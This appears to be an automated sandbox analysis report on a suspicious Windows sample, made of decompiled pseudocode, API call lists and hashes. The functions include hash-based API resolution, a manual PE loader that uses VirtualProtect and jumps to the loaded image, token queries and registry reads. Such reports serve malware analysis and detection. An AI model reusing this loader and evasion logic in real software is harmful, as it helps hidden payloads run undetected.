0x6e7108b5
0x6e7108be
0x6e7108c3
0x6e7108c3
0x6e7108c5
0x6e7108d6
0x6e7108f8
0x6e7108fa
0x6e7108fb
0x6e7108ff
0x6e7108ff
0x6e710908
0x6e710914
0x6e71091d
0x6e710933
0x6e710943
0x6e710948
0x6e71094c
0x6e710951
0x6e710953
0x6e7109a3
0x6e7109b8
0x6e7109bc
0x6e7109c1
0x6e7109d2
0x6e7109e7
0x6e7109eb
0x6e7109f0
0x6e7109f2
0x6e710a39
0x6e710a3c
0x6e710a8a
0x6e710a8d
0x6e710ace
0x6e710ad2
0x6e710ad7
0x6e710adc
0x6e710afb
0x6e710afb
0x6e710afb
0x6e710afd
0x00000000
0x6e710afd
0x6e710ade
0x6e710ae2
0x6e710ae4
0x6e710aeb
0x6e710aeb
0x6e710af1
0x6e710af1
0x6e710af3
0x6e710af6
0x6e710af6
0x00000000
0x6e710af3
0x6e710ae6
0x6e710ae9
0x6e710aef
0x6e710aef
0x00000000
0x6e710aef
0x00000000
0x6e710ae9
0x6e710a8f
0x6e710a92
0x00000000
0x00000000
0x6e710a98
0x6e710a9d
0x6e710aa2
0x6e710ac1
0x6e710ac1
0x6e710acb
0x00000000
0x6e710acb
0x6e710aa4
0x6e710aa8
0x6e710aaa
0x6e710ab1
0x6e710ab1
0x6e710ab7
0x6e710ab7
0x6e710ab9
0x6e710abc
0x6e710abc
0x00000000
0x6e710ab9
0x6e710aac
0x6e710aaf
0x6e710ab5
0x6e710ab5
0x00000000
0x6e710ab5
0x00000000
0x6e710aaf
0x6e710a3e
0x6e710a40
0x6e710a7f
0x6e710a82
0x6e710df4
0x6e710df9
0x6e710dfe
0x6e710e1d
0x6e710e1d
0x6e710e27
0x00000000
0x6e710e27
0x6e710e00
0x6e710e04
0x6e710e06
0x6e710e0d
0x6e710e0d
0x6e710e13
0x6e710e13
0x6e710e15
0x6e710e18
0x6e710e18
0x00000000
0x6e710e15
0x6e710e08
0x6e710e0b
0x6e710e11
0x6e710e11
0x00000000
0x6e710e11
0x00000000
0x6e710e0b
0x00000000
0x6e710a88
0x6e710a46
0x6e710a4b
0x6e710a50
0x6e710a6f
0x6e710a6f
0x6e710a79
0x00000000
0x6e710a79
0x6e710a52
0x6e710a56
0x6e710a58
0x6e710a5f
0x6e710a5f
0x6e710a65
0x6e710a65
0x6e710a67
0x6e710a6a
0x6e710a6a
0x00000000
0x6e710a67
0x6e710a5a
0x6e710a5d
0x6e710a63
0x6e710a63
0x00000000
0x6e710a63
0x00000000
0x6e710a5d
0x6e7109f4
0x6e7109f6
0x00000000
0x00000000
0x6e710a00
0x6e710a05
0x6e710a0a
0x6e710a29
0x6e710a29
0x6e710a33
0x00000000
0x6e710a33
0x6e710a0c
0x6e710a10
0x6e710a12
0x6e710a19
0x6e710a19
0x6e710a1f
0x6e710a1f
0x6e710a21
0x6e710a24
0x6e710a24
0x00000000
0x6e710a21
0x6e710a14
0x6e710a17
0x6e710a1d
0x6e710a1d
0x00000000
0x6e710a1d
0x00000000
0x6e710a17
0x6e710959
0x6e71095e
0x6e710963
0x6e710982
0x6e710982
0x6e71098c
0x00000000
0x6e71098c
0x6e710965
0x6e710969
0x6e71096b
0x6e710972
0x6e710972
0x6e710978
0x6e710978
0x6e71097a
0x6e71097d
0x6e71097d
0x00000000
0x6e71097a
0x6e71096d
0x6e710970
0x6e710976
0x6e710976
0x00000000
0x6e710976
0x00000000
0x6e71089a
0x6e71089c
0x6e710b01
0x6e710b06
0x6e710b09
0x6e710b0e
0x6e710b10
0x6e710b25
0x6e710b28
0x6e710bf6
0x6e710bfe
0x6e710c01
0x6e710c16
0x6e710c20
0x6e710c20
0x6e710c22
0x6e710c24
0x6e710c33
0x6e710c3f
0x6e710c43
0x6e710c46
0x6e710c49
0x6e710c4c
0x00000000
0x6e710c4c
0x6e710b38
0x6e710b4a
0x6e710b4e
0x6e710bda
0x6e710bda
0x6e710be0
0x6e710beb
0x6e710be2
0x6e710be2
0x6e710be2
0x00000000
0x6e710be0
0x6e710b5b
0x6e710b5c
0x6e710b5e
0x6e710b64
0x6e710fb3
0x6e710fb8
0x6e710fba
0x00000000
0x00000000
0x6e710fc0
0x6e710b7b
0x6e710b7f
0x6e710b84
0x6e710b96
0x6e710b9a
0x6e710ba5
0x6e710ba6
0x6e710ba7
0x6e710ba8
0x6e710baa
0x6e710bb5
0x6e710e2d
0x6e710e2d
0x6e710bb5
0x6e710bbb
0x6e710bc4
0x6e710e3f
0x6e710e55
0x6e710e57
0x6e710e59
0x6e710f94
0x6e710f9b
0x00000000
0x6e710f9b
0x6e710e68
0x6e710e76
0x6e710e90
0x6e710e92
0x6e710e94
0x6e710fa5
0x6e710faa
0x6e710fac
0x00000000
0x00000000
0x6e710fae
0x6e710ea8
0x6e710eb3
0x6e710ec2
0x6e710ed4
0x6e710ed6
0x6e710ed8
0x6e710ee5
0x6e710ee5
0x6e710ef5
0x6e710f06
0x6e710f0b
0x6e710f0d
0x6e710f0f
0x6e710f16
0x6e710f17
0x6e710f17
0x6e710f23
0x6e710f44
0x6e710f4d
0x6e710f59
0x6e710f65
0x6e710f6a
0x6e710f6f
0x6e710f75
0x6e710f75
0x6e710f7a
0x6e710f80
0x00000000
0x6e710f86
0x6e710f88
0x00000000
0x6e710f88
0x6e710bca
0x6e710bca
0x6e710bcf
0x6e710bd5
0x6e710bd5
0x00000000
0x6e710bcf
0x6e710bc4
0x6e710898
0x6e710808
0x6e710809
0x6e71080b
0x6e710811
0x6e710dde
0x6e710de3
0x6e710de5
0x00000000
0x00000000
0x6e710deb
0x6e710828
0x6e71082c
0x6e710831
0x6e710847
0x6e71085e
0x6e710862
0x6e710c5a
0x6e710c5a
0x6e710862
0x6e710868
0x6e710871
0x6e710c69
0x6e710c7a
0x6e710c7f
0x6e710c81
0x6e710c83
0x6e710db4
0x6e710db8
0x00000000
0x6e710db8
0x6e710c8f
0x6e710cb4
0x6e710cb6
0x6e710cb8
0x6e710dd0
0x6e710dd5
0x6e710dd7
0x00000000
0x00000000
0x6e710dd9
0x6e710cc9
0x6e710cd7
0x6e710cde
0x6e710cdf
0x6e710ce0
0x6e710cf2
0x6e710cf4
0x6e710cf6
0x00000000
0x00000000
0x6e710cfe
0x6e710d19
0x6e710d1b
0x6e710d1d
0x6e710dc2
0x6e710dc7
0x6e710dc9
0x00000000
0x00000000
0x6e710dcb
0x6e710d23
0x6e710d2a
0x6e710d2e
0x6e710d99
0x6e710d99
0x6e710d9b
0x6e710da2
0x6e710da2
0x6e710da8
0x6e710da8
0x6e710daa
0x6e710daf
0x6e710daf
0x00000000
0x6e710daa
0x6e710d9d
0x6e710da0
0x6e710da6
0x6e710da6
0x00000000
0x6e710da6
0x00000000
0x6e710da0
0x6e710d30
0x6e710d30
0x6e710d32
0x6e710d3e
0x6e710d43
0x6e710d45
0x00000000
0x00000000
0x6e710d47
0x6e710d4b
0x6e710d52
0x6e710d53
0x6e710d54
0x6e710d56
0x00000000
0x00000000
0x6e710d58
0x6e710d5a
0x6e710d61
0x6e710d61
0x6e710d67
0x6e710d67
0x6e710d69
0x6e710d6e
0x6e710d6e
0x6e710d77
0x6e710d7c
0x6e710d81
0x6e710d87
0x6e710d87
0x6e710d8c
0x00000000
0x6e710d8c
0x6e710d5c
0x6e710d5f
0x6e710d65
0x6e710d65
0x00000000
0x6e710d65
0x00000000
0x6e710d93
0x6e710d93
0x6e710d94
0x6e710d94
0x00000000
0x6e710d32
0x6e710877
0x6e71087c
0x6e710882
0x6e710882
0x00000000
0x6e710c59
0x6e710c59
0x6e710c59

APIs

GetTokenInformation.KERNELBASE(?,00000002,00000000,00000000,00000000,150C05FC,150C05FC), ref: 6E71085E
GetSystemInfo.KERNELBASE(?,8E844D1E,8E844D1E,?,?,360D0C74,?,?,1E55AAEC,?,?,C0092A94,00000000,80000002,00000000,-000000FC), ref: 6E710C20
GetTokenInformation.KERNELBASE(?,00000002,00000000,00000000,00000000,00000000,150C05FC,150C05FC,00000000,150C05FC,150C05FC), ref: 6E710CB4

Memory Dump Source

Source File: 00000000.00000002.1058145995.000000006E701000.00000020.00020000.sdmp, Offset: 6E700000, based on PE: true

Associated: 00000000.00000002.1058138824.000000006E700000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1058162892.000000006E71A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1058172401.000000006E71D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1058180186.000000006E71F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: InformationToken$InfoSystem
String ID:
API String ID: 298373132-0
Opcode ID: 5abab19c520a1b1c532fa626d17239c94981bdf6b8d1142793c08ff308f86af4
Instruction ID: 59596437712c1bb532b22486483188d9510e370cdfccfa157369080359191a98
Opcode Fuzzy Hash: 5abab19c520a1b1c532fa626d17239c94981bdf6b8d1142793c08ff308f86af4
Instruction Fuzzy Hash: 7622D37060C341AFE764DEA4CA54BDF77E9AF81708F18882DA894972B4EB30D915CB52

Uniqueness

Uniqueness Score: -1.00%

Function 6E712234, Relevance: 1.5, APIs: 1, Instructions: 30
nativeCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E6E712234(void* __ecx, intOrPtr __edx, void* __esi) {
				intOrPtr _v4;
				intOrPtr _v20;
				intOrPtr* _t5;
				intOrPtr _t11;
				intOrPtr* _t13;
				intOrPtr* _t15;

				_t11 = __edx;
				if(__ecx == 0) {
					 *_t15 = 0;
					_v4 = 0;
				} else {
					 *_t15 = E6E713AF8(0xffffd8f0, 0xffffffff, __ecx, 0);
					_v20 = _t11;
				}
				_t5 = E6E71306C(0x60a28c5c, 0x11cab064, 0x60a28c5c, 0x60a28c5c);
				_t13 = _t5;
				if(_t13 != 0) {
					_t5 =  *_t13(0, _t15); // executed
				}
				return _t5;
			}

0x6e712234
0x6e712238
0x6e712254
0x6e712257
0x6e71223a
0x6e712249
0x6e71224c
0x6e71224c
0x6e712267
0x6e71226c
0x6e712270
0x6e712278
0x6e712278
0x6e71227c

APIs

NtDelayExecution.NTDLL(00000000,00000000,60A28C5C,60A28C5C,FFFFFFFF,FFFFFFFF,6E704B17,00000000,00000000,?), ref: 6E712278

Memory Dump Source

Source File: 00000000.00000002.1058145995.000000006E701000.00000020.00020000.sdmp, Offset: 6E700000, based on PE: true

Associated: 00000000.00000002.1058138824.000000006E700000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1058162892.000000006E71A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1058172401.000000006E71D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1058180186.000000006E71F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: DelayExecution
String ID:
API String ID: 1249177460-0
Opcode ID: 2c9c5e460e6a6f6e58fad2ac9a5298f00f0cc66bf3291dc41720851ba70b474b
Instruction ID: 79646b687ede98d12eb5aa5956366e4c5e06f25e2ca4729e2e5a01972c0aa977
Opcode Fuzzy Hash: 2c9c5e460e6a6f6e58fad2ac9a5298f00f0cc66bf3291dc41720851ba70b474b
Instruction Fuzzy Hash: 3BE065B060E302BDEB449AA89D04BAF36DCAF85610F25893DB468D7194F67094019762

Uniqueness

Uniqueness Score: -1.00%

Function 6E712820, Relevance: 1.5, APIs: 1, Instructions: 29
memorynativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6E712820(void* __ecx, long __edx, void* __esi, long _a4, long _a8, void* _a12) {
				long _v4;
				void* _t8;
				long _t10;
				PVOID* _t19;

				_v4 = __edx;
				 *_t19 = __ecx;
				if(E6E71306C(0x60a28c5c, 0x414fdf7, 0x60a28c5c, 0x60a28c5c) == 0) {
					L3:
					_t8 =  *_t19;
				} else {
					_t10 = NtAllocateVirtualMemory(_a12, _t19, 0,  &_v4, _a4, _a8); // executed
					if(_t10 == 0) {
						goto L3;
					} else {
						_t8 = 0;
					}
				}
				return _t8;
			}

0x6e712827
0x6e712830
0x6e71283e
0x6e712861
0x6e712861
0x6e712840
0x6e712857
0x6e71285b
0x00000000
0x6e71285d
0x6e71285d
0x6e71285d
0x6e71285b
0x6e712866

APIs

NtAllocateVirtualMemory.NTDLL(6E7188E6,?,00000000,000000FF,6E7188E6,6E7188E6,60A28C5C,60A28C5C,?,?,6E7188E6,00003000,00000004,000000FF), ref: 6E712857

Memory Dump Source

Source File: 00000000.00000002.1058145995.000000006E701000.00000020.00020000.sdmp, Offset: 6E700000, based on PE: true

Associated: 00000000.00000002.1058138824.000000006E700000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1058162892.000000006E71A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1058172401.000000006E71D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1058180186.000000006E71F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: 1b6e0df76e67549dfb1e774fc107f98af224613b3e03ad2134b0c600fba901d1
Instruction ID: 1140da486dabbc3ec15e944f190bf10d08ccda13dbab9074a88ec142978591f4
Opcode Fuzzy Hash: 1b6e0df76e67549dfb1e774fc107f98af224613b3e03ad2134b0c600fba901d1
Instruction Fuzzy Hash: 49E0397120D382AFEB08CA99CD24EABB7E9EF85604F148C2DB494C6260D730D800AB25

Uniqueness

Uniqueness Score: -1.00%

Function 6E713138, Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E6E713138(intOrPtr* __ecx) {
				void* _t1;

				_push(E6E7134B0);
				_push(1); // executed
				_t1 =  *__ecx(); // executed
				return _t1;
			}

0x6e713138
0x6e71313d
0x6e71313f
0x6e713141

APIs

RtlAddVectoredExceptionHandler.NTDLL(00000001,6E7134B0,6E713128,60A28C5C,60A28C5C,?,6E706C99,00000000), ref: 6E71313F

Memory Dump Source

Source File: 00000000.00000002.1058145995.000000006E701000.00000020.00020000.sdmp, Offset: 6E700000, based on PE: true

Associated: 00000000.00000002.1058138824.000000006E700000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1058162892.000000006E71A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1058172401.000000006E71D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1058180186.000000006E71F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: ExceptionHandlerVectored
String ID:
API String ID: 3310709589-0
Opcode ID: 6b283cccafd3b787c4eddb91634db8091b8e5254f3507f3edaf0e528c98e277d
Instruction ID: f98d80218f51104548d0816d31086ec1b987c789974495d87429cdf764020694
Opcode Fuzzy Hash: 6b283cccafd3b787c4eddb91634db8091b8e5254f3507f3edaf0e528c98e277d
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 00A42092, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 224
memoryCOMMON

Download Yara Rule

C-Code - Quality: 42%

			E00A42092(long __ebx, void* __edi, long __esi, intOrPtr* _a4) {
				char _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				char _v44;
				intOrPtr* _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				void* _v68;
				char* _v72;
				int _v76;
				long _v80;
				long _v84;
				DWORD* _v88;
				intOrPtr _v92;
				int _v96;
				intOrPtr* _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				void* _v116;
				intOrPtr _v120;
				intOrPtr _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				intOrPtr _v140;
				signed int _v144;
				intOrPtr _v148;
				intOrPtr _v152;
				int _v156;
				char* _v160;
				intOrPtr _v164;
				intOrPtr _v168;
				intOrPtr _v172;
				char* _v176;
				intOrPtr _v180;
				intOrPtr _v184;
				char _v188;
				intOrPtr* _t140;
				int _t147;
				int _t155;
				int _t159;
				intOrPtr _t174;
				int _t183;
				intOrPtr _t226;
				void* _t233;
				intOrPtr _t236;
				void* _t243;
				intOrPtr* _t247;
				unsigned int _t250;
				intOrPtr _t259;
				DWORD* _t271;
				void* _t275;
				intOrPtr* _t278;
				intOrPtr* _t279;

				_t140 = _a4;
				_v20 = 0;
				_t243 =  *((intOrPtr*)(_t140 + 0x44));
				 *0xa44418 = 1;
				asm("movaps xmm0, [0xa43010]");
				asm("movups [0xa44428], xmm0");
				_v48 = _t140;
				_v52 =  *((intOrPtr*)(_t140 + 0x48));
				_v56 =  *((intOrPtr*)(_v48 + 0x38));
				_v188 = _t243;
				_v184 =  *((intOrPtr*)(_v48 + 0x58));
				_v180 = 4;
				_v176 =  &_v20;
				_v60 =  *((intOrPtr*)(_t140 + 0x54));
				_v64 = 4;
				_v68 = _t243;
				_v72 =  &_v20;
				_t147 = VirtualProtect(__edi, __ebx, __esi, _t271); // executed
				_v76 = _t147;
				_v188 = _v68;
				_v184 = 0;
				_v180 =  *((intOrPtr*)(_v48 + 0x58));
				_v80 = 0x400;
				_v84 = 2;
				_v88 =  &_v20;
				_v92 = 0;
				E00A41770();
				E00A417BD(_v68,  *((intOrPtr*)(_v48 + 0x28)), _v56);
				E00A41770( *((intOrPtr*)(_v48 + 0x28)), 0, _v56);
				_t155 = VirtualProtect(_v68, 0x400, 2, _v88); // executed
				_t278 = _t275 - 0x8c;
				_t233 = _v68;
				_t259 =  *((intOrPtr*)(_t233 + 0x3c));
				_v96 = _t155;
				_v100 = _v68 + 0x3c;
				_v104 = _t233;
				_v108 = _t259;
				if(_t259 != 0) {
					_v104 = _v68 + (_v108 + 0x0000ffff & 0x0000ffff) + 1;
				}
				_v120 = _v104;
				if(_v60 != 0) {
					_v124 = 0;
					_v128 = _v120 + 0x18 + ( *(_v120 + 0x14) & 0x0000ffff);
					while(1) {
						_t174 = _v128;
						_t250 =  *(_t174 + 0x24);
						_v140 = _t174;
						_v144 = _t250 >> 0x1f;
						_v148 =  *((intOrPtr*)(_v140 + 8));
						_v188 = _v68 +  *((intOrPtr*)(_v140 + 0xc));
						_v184 = _v148;
						_v180 =  *((intOrPtr*)(0xa44418 + ((_t250 >> 0x0000001e & 0x00000001) << 4) + (_v144 << 3) + ((_t250 >> 0x0000001d & 0x00000001) << 2)));
						_v176 =  &_v20;
						_v152 = _v124;
						_t183 = VirtualProtect(??, ??, ??, ??); // executed
						_t278 = _t278 - 0x10;
						_t226 = _v152 + 1;
						_v156 = _t183;
						_v124 = _t226;
						_v128 = _v140 + 0x28;
						if(_t226 == _v60) {
							goto L8;
						}
					}
				}
				L8:
				 *_t278 = _v68;
				_v132 = _v68 +  *((intOrPtr*)(_v48 + 0x24));
				_t159 = DisableThreadLibraryCalls(??);
				_t279 = _t278 - 4;
				_t236 =  *_v100;
				_v136 = _t159;
				_v112 = _t236;
				_v116 = _v68;
				if(_t236 != 0) {
					_v116 = _v68 + (_v112 + 0x0000ffff & 0x0000ffff) + 1;
				}
				_t247 = _v48;
				_v44 =  *((intOrPtr*)(_t247 + 0x50));
				_v40 =  *_t247;
				_v36 =  *((intOrPtr*)(_t247 + 0x18));
				_v32 =  *((intOrPtr*)(_t247 + 0x4c));
				_v28 =  *((intOrPtr*)(_t247 + 0x10));
				_v24 = _v132;
				 *_t279 = _t247;
				_v188 = 0;
				_v184 = 0x60;
				_v160 =  &_v44;
				_v164 = 0;
				_v168 = 0x60;
				_v172 =  *((intOrPtr*)(_v116 + 0x28));
				E00A41770();
				if(_v172 != 0) {
					_t279 =  *((intOrPtr*)( &_v44 + 0x10));
					goto __eax;
				}
				return 1;
			}

0x00a4209e
0x00a420ac
0x00a420b3
0x00a420b6
0x00a420c0
0x00a420c7
0x00a420d1
0x00a420d7
0x00a420e0
0x00a420e9
0x00a420ec
0x00a420f0
0x00a420f8
0x00a420ff
0x00a42102
0x00a42105
0x00a42108
0x00a4210b
0x00a42125
0x00a4212b
0x00a4212e
0x00a42136
0x00a4213a
0x00a4213d
0x00a42140
0x00a42143
0x00a42146
0x00a42162
0x00a4217f
0x00a421a4
0x00a421a6
0x00a421af
0x00a421b2
0x00a421bc
0x00a421bf
0x00a421c2
0x00a421c5
0x00a421c8
0x00a42216
0x00a42216
0x00a42249
0x00a4224c
0x00a4225c
0x00a4225f
0x00a422a8
0x00a422a8
0x00a422b7
0x00a422bf
0x00a422cd
0x00a422dc
0x00a4230d
0x00a42316
0x00a4231a
0x00a4231e
0x00a42325
0x00a4232b
0x00a4232d
0x00a42336
0x00a42347
0x00a4234d
0x00a42350
0x00a42353
0x00000000
0x00000000
0x00a42359
0x00a422a8
0x00a42264
0x00a42272
0x00a4227a
0x00a4227d
0x00a4227f
0x00a42285
0x00a42291
0x00a42297
0x00a4229a
0x00a4229d
0x00a421f9
0x00a421f9
0x00a4236e
0x00a42374
0x00a42379
0x00a4237f
0x00a42385
0x00a4238b
0x00a42391
0x00a42394
0x00a42397
0x00a4239f
0x00a423a7
0x00a423ad
0x00a423b3
0x00a423b9
0x00a423bf
0x00a423cd
0x00a421da
0x00a421e0
0x00a421e0
0x00a42234

APIs

VirtualProtect.KERNELBASE ref: 00A4210B
VirtualProtect.KERNELBASE ref: 00A421A4
VirtualProtect.KERNELBASE ref: 00A4232B

Strings

`, xrefs: 00A4239F

Memory Dump Source

Source File: 00000000.00000002.1057781343.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: true

Similarity

API ID: ProtectVirtual
String ID: `
API String ID: 544645111-2679148245
Opcode ID: adcfd51a37da6404c9e6d1510f625b1d4aa40c8ae93fa985a7df09aab97ab0ad
Instruction ID: d5579d58c81ff37532086df8b971ea96ba9ccfc28f07037d9351aa589d6906d5
Opcode Fuzzy Hash: adcfd51a37da6404c9e6d1510f625b1d4aa40c8ae93fa985a7df09aab97ab0ad
Instruction Fuzzy Hash: ABB1BFB9D00218CFCB14CF99C980A9DBBF1BF88314F55816AE958AB351D731A981CF91

Uniqueness

Uniqueness Score: -1.00%

Function 6E715E84, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 45
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6E715E84(void* __ecx, void* __eflags, void* _a4, char _a8) {
				long _v12;
				void* __esi;
				long _t9;
				long _t10;
				int _t12;
				void* _t18;
				void** _t19;
				DWORD* _t20;

				_t18 = __ecx;
				_t19 = __ecx + 0xc;
				if(E6E70C280(_t19) == 0) {
					_t2 =  &_a8; // 0x6e715d79
					_v12 =  *_t2;
					if(E6E713064(0x8e844d1e, 0xed3ed1cc) == 0) {
						_t9 = 0x7f;
					} else {
						_t12 = ReadFile( *_t19, _a4, _v12, _t20, 0); // executed
						if(_t12 == 0) {
							_t9 = E6E7135F0(_t18);
						} else {
							_t9 = 0;
						}
					}
					 *((intOrPtr*)(_t18 + 8)) = _t9;
					if(_t9 == 0) {
						_t10 = _v12;
					} else {
						_t10 = 0;
						_v12 = 0;
					}
				} else {
					_t10 = 0;
				}
				return _t10;
			}

0x6e715e87
0x6e715e89
0x6e715e95
0x6e715e9b
0x6e715e9f
0x6e715eb5
0x6e715ed4
0x6e715eb7
0x6e715ec8
0x6e715ecc
0x6e715eec
0x6e715ece
0x6e715ece
0x6e715ece
0x6e715ecc
0x6e715ed5
0x6e715eda
0x6e715ee3
0x6e715edc
0x6e715edc
0x6e715ede
0x6e715ede
0x6e715e97
0x6e715e97
0x6e715e97
0x6e715ee9

APIs

ReadFile.KERNELBASE(?,?,00000000,00000000,00000000,8E844D1E,ED3ED1CC,?,?,?,6E715D79,00000000,?,00000000,?), ref: 6E715EC8

Strings

y]qn, xrefs: 6E715E9B

Memory Dump Source

Source File: 00000000.00000002.1058145995.000000006E701000.00000020.00020000.sdmp, Offset: 6E700000, based on PE: true

Associated: 00000000.00000002.1058138824.000000006E700000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1058162892.000000006E71A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1058172401.000000006E71D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1058180186.000000006E71F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: FileRead
String ID: y]qn
API String ID: 2738559852-3476654337
Opcode ID: 84a6624f29361c2a8c98364ad473c0758c1d35c4603bde8f3404ef6b27891e48
Instruction ID: 994bf4337c2d7f502ee6ba0a01a6f2aff6b459500a1fc28942b4a7a65a33381f
Opcode Fuzzy Hash: 84a6624f29361c2a8c98364ad473c0758c1d35c4603bde8f3404ef6b27891e48
Instruction Fuzzy Hash: EEF0D63061C303AED755DEA9AE00AEA77D9EF45250F184C29A895DA160EA32D408CA21

Uniqueness

Uniqueness Score: -1.00%

Function 6E7110A4, Relevance: 3.2, APIs: 2, Instructions: 153
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E6E7110A4(void* __ebx, void* __ecx) {
				intOrPtr* _t34;
				long* _t55;
				long* _t59;
				intOrPtr* _t64;
				void* _t73;
				void* _t74;
				void* _t79;
				long* _t80;

				_t74 = __ecx;
				_t80[7] = 0;
				_t64 = E6E71306C(0x150c05fc, 0x1da4d409, 0x150c05fc, 0x150c05fc);
				if(_t64 != 0) {
					 *_t64(_t74, 8,  &(_t80[7]));
				}
				_t55 = _t80;
				 *_t55 = _t80[7];
				_t55[1] = 1;
				if(E6E70C280(_t55) != 0) {
					L6:
					if(_t80[1] != 0) {
						E6E70BB44(_t80);
					}
					return 0;
				}
				_t80[6] = 0;
				if(E6E71306C(0x150c05fc, 0xf2377aa1, 0x150c05fc, 0x150c05fc) != 0) {
					GetTokenInformation(_t80[4], 0x19, 0, 0,  &(_t80[6])); // executed
				}
				_t30 = _t80[6];
				if(_t80[6] != 0) {
					E6E70F584( &(_t80[3]), _t30);
					_t59 =  &(_t80[3]);
					_t73 = E6E70F4BC(_t59, 0);
					_t34 = E6E71306C(0x150c05fc, 0xf2377aa1, 0x150c05fc, 0x150c05fc);
					if (_t34 == 0) goto L33;
					 *_t34 =  *_t34 + _t34;
					 *((intOrPtr*)(_t79 + 0x50182444)) =  *((intOrPtr*)(_t79 + 0x50182444)) + _t59;
				} else {
					goto L6;
				}
			}

0x6e7110b3
0x6e7110b5
0x6e7110c4
0x6e7110c8
0x6e7110d2
0x6e7110d2
0x6e7110d8
0x6e7110db
0x6e7110dd
0x6e7110e8
0x6e711122
0x6e711127
0x6e71112c
0x6e71112c
0x00000000
0x6e711131
0x6e7110f4
0x6e711107
0x6e711118
0x6e711118
0x6e71111a
0x6e711120
0x6e71113e
0x6e711145
0x6e71114e
0x6e71115c
0x6e711165
0x6e711168
0x6e71116a
0x00000000
0x00000000
0x00000000

APIs

GetTokenInformation.KERNELBASE(?,00000019,00000000,00000000,00000000,150C05FC,150C05FC,150C05FC,150C05FC), ref: 6E711118
GetTokenInformation.KERNELBASE(?,00000019,00000000,00000000,00000000,150C05FC,150C05FC,00000000,00000000,150C05FC,150C05FC,150C05FC,150C05FC), ref: 6E71117B

Memory Dump Source

Source File: 00000000.00000002.1058145995.000000006E701000.00000020.00020000.sdmp, Offset: 6E700000, based on PE: true

Associated: 00000000.00000002.1058138824.000000006E700000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1058162892.000000006E71A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1058172401.000000006E71D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1058180186.000000006E71F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: InformationToken
String ID:
API String ID: 4114910276-0
Opcode ID: d1c2dcb2a1f8ff365f9feba055c13003afed043bcda7b31fb4d269ac4384018e
Instruction ID: ba6dc27c1ba3d0644efd0c38017048f57cc77a65bef98cf8a11830cb60db0a60
Opcode Fuzzy Hash: d1c2dcb2a1f8ff365f9feba055c13003afed043bcda7b31fb4d269ac4384018e
Instruction Fuzzy Hash: 5D41267074C343ABEB15C9E89E24BEF76DD9BA1300F188878B550CE1B4DB64C849CB52

Uniqueness

Uniqueness Score: -1.00%

Function 6E7157B4, Relevance: 3.1, APIs: 2, Instructions: 74
registryCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E6E7157B4(void* __ecx, char* _a4, intOrPtr _a8) {
				int _v16;
				int _v20;
				intOrPtr _t11;
				int* _t12;
				int _t13;
				void* _t23;
				char* _t35;
				int* _t38;

				_push(_t34);
				_t23 = __ecx;
				_t11 =  *((intOrPtr*)(__ecx + 4));
				if(_t11 == 0 || _t11 == 0xffffffff) {
					_t12 = 1;
				} else {
					_t12 = 0;
				}
				if(_t12 != 0) {
					L10:
					_t13 = 0;
				} else {
					_t35 = _a4;
					if(_t35 == 0 ||  *_t35 != 0) {
						_v20 = 0;
						_v16 = 0;
						if(E6E713064(0x150c05fc, 0x545b7fe2) != 0) {
							RegQueryValueExA( *(_t23 + 4), _t35, 0, _t38, 0,  &_v16); // executed
						}
						_t15 = _v16;
						if(_v16 != 0) {
							E6E70F828(_a8, _t15);
							if(E6E713064(0x150c05fc, 0x545b7fe2) != 0) {
								RegQueryValueExA( *(_t23 + 4), _t35, 0, _t38, E6E70F4BC(_a8, 0),  &_v20); // executed
							}
							_t13 = _v20;
						} else {
							goto L10;
						}
					} else {
						goto L10;
					}
				}
				return _t13;
			}

0x6e7157b8
0x6e7157b9
0x6e7157bb
0x6e7157c0
0x6e7157c7
0x6e7157cb
0x6e7157cb
0x6e7157cb
0x6e7157cf
0x6e715815
0x6e715815
0x6e7157d1
0x6e7157d1
0x6e7157d7
0x6e7157e0
0x6e7157e3
0x6e7157fa
0x6e71580b
0x6e71580b
0x6e71580d
0x6e715813
0x6e71581e
0x6e715836
0x6e715856
0x6e715856
0x6e715858
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x6e7157d7
0x6e715860

APIs

